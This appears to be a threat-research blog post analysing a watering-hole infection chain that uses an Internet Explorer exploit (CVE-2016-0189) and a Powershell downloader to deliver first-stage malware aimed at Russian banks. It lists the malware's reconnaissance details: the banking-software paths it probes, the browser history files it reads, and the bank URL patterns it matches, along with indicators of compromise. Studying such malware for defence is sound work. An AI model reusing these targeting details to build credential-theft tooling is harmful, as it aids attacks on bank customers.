The infection chain starts with the compromised site eurolab[.]ua, which is a popular health site. This site in Ukraine reaches about half a million visitors per month. It is important to note that even though the site is in Ukraine, 40% of its visitors are from Russia, according to Alexa stats. This will become clearly relevant to the rest of our analysis.

The compromised site leads visitors to rozhlas[.]site which has a browser exploit with CVE-2016-0189. This exploit is effective against Microsoft IE unpatched versions 9 through 11. After successful exploitation, an embedded Powershell script will further download a first stage malware which in turn downloads NSIS packed payloads with spying modules and a backdoor.

In this blog post we cover the infection chain and the first stage malware.

Infection Chain Analysis
Infection chain :
infection_new

In the above chain you can see that the page rozhlas[.]site/news/business/ contains the aforementioned IE exploit. The following snippet of code shows the VBscript exploit with CVE-2016-0189:
exploit

After a successful execution of the exploit, it runs an embedded Powershell script to download the first stage malware. The subroutine firewrite of VBscript performs this task.
powershell

As we can see the Powershell script is base64 encoded. The following snapshot shows the de-obfuscated script which downloads the first stage malware into a file called cache.bin. 

powershell_new

We will cover the detailed analysis of this malware in this blog.

First Stage Malware Analysis

This first stage malware’s main motive is to check for the certain environmental factors to confirm its victim is a good target. It first checks for specific banking software and user browsing history and based on that it will download the second stage malware. It is clear from this technique that the hacker group is only interested in implanting their malware onto systems that are part of a banking system.

This malware Logs information in  c:\Loginfo.txt and C:\WINDOWS\Debug\UserMode\userenv.txt.

If any of the two checks above is true, it will download its second stage malware using the following URL link:

Otherwise, it will download a benign sample using the link below. This is an anti-analysis and anti-sandbox employed by the malware.

The malicious file is saved in %appdata%\..\ssl_bapi.exe or %tmp%\ssl_bapi.exe depending on the windows OS version.

Digital certificate :
certificate

It is clear that the malware is trying to bypass some anti-malware solutions by utilizing a signed binary, even though the signature is not valid.

1) Banking related running processes & installed software  checks
Running process check :
In this check it performs WMI query “SELECT Name FROM Win32_Process” to enumerate processes running on the victim’s computer. If this fails it perform the same check with Process32First and Process32Next APIs.
The following code snippet shows the implementation of WMI:
wmi-service

The following implementation shows Process32First & Process32Next loop for finding running processes.
first_next

All the following software are related to Russian banks so it seems this malware targets Russian financial institutions.
files

Installed software check :
This is the implementation which perform the installed software check in various locations in order to confirm the victim is using certain banking applications.
software_check_new

List of locations :
%PROFILE% : “iBank2”
%APPDATA% : “amicon,bifit,*bss,*ibank”
%PROGRAMFILES32% : “*gpb,inist,mdm,bifit,Aladdin,Amicon,*bss,Signal-COM,iBank2,*\\bc.exe,*\\*\\intpro.exe,*cft,agava,*R-Style,*AKB Perm”
%PROGRAMFILES64% : “*gpb,inist,mdm,bifit,Aladdin,Amicon,*bss,Signal-COM,iBank2,*\\bc.exe,*\\*\\intpro.exe,*cft,agava,*R-Style,*AKB Perm”
%SYSTEMDRIVE% : “*SFT,*Agava,*Clnt,*CLUNION.0QT,*5NT,*BS,*ELBA,*Bank,ICB_C,*sped,*gpb”
%Desktop%: “*ELBA,*ELBRUS”

2 ) Victim’s browsing history checks
The following screenshot shows various locations used by the malware for checking various browser’s cache.
history_check

Below is the list of locations referred to by the malware:
%localappdata%\Google\Chrome\User Data\Default\History
%appdata%\Google\Chrome\User Data\Default\History
%appdata%\Mozilla\Firefox\Profiles
%appdata%\Opera\Opera\global_history.dat

This  malware uses FindFirstUrlCacheEntryA API to query the above mentioned locations. The following screenshot shows the implementation.
query

The malware tries to match the Victim’s browser cache with any of the following strings: 
*ICPortalSSL*
*isfront.priovtb.com*
*PortalSSL*
*beta.mcb.ru*
*ibank*
*ibrs*
*iclient*
*e-plat.mdmbank.com*
*sberweb.zubsb.ru*
*ibc*
*elbrus*
*i-elba*
*clbank.minbank.ru*
*chelindbank.ru/online/*
*uwagb*
*wwwbank*
*dbo*
*ib.

Again, all of these strings lead to Russian banking web sites.

Conclusion

It seems that hackers are still going after Russian banks even after the demise of the Lurk group and the very publicized arrests by Russian law enforcement. It also seems that this group has invested in expanding their capability by introducing a known vulnerability in their arsenal, which could be the result of insider knowledge of the software installed on targeted systems.

The second stage malware which we have not covered in this blog post shows advanced capability of keylogging, spying, smartcard reading etc. We will update this blog as further analysis becomes available.

References :
http://www.group-ib.com/brochures/gib-buhtrap-report.pdf
http://www.welivesecurity.com/2015/04/09/operation-buhtrap/

IOCs :
First stage malware hash: a6569546896b6d8ad95e4dbcc346a68b.

Analysis by Dhruval Gandhi & Paul Kimayong.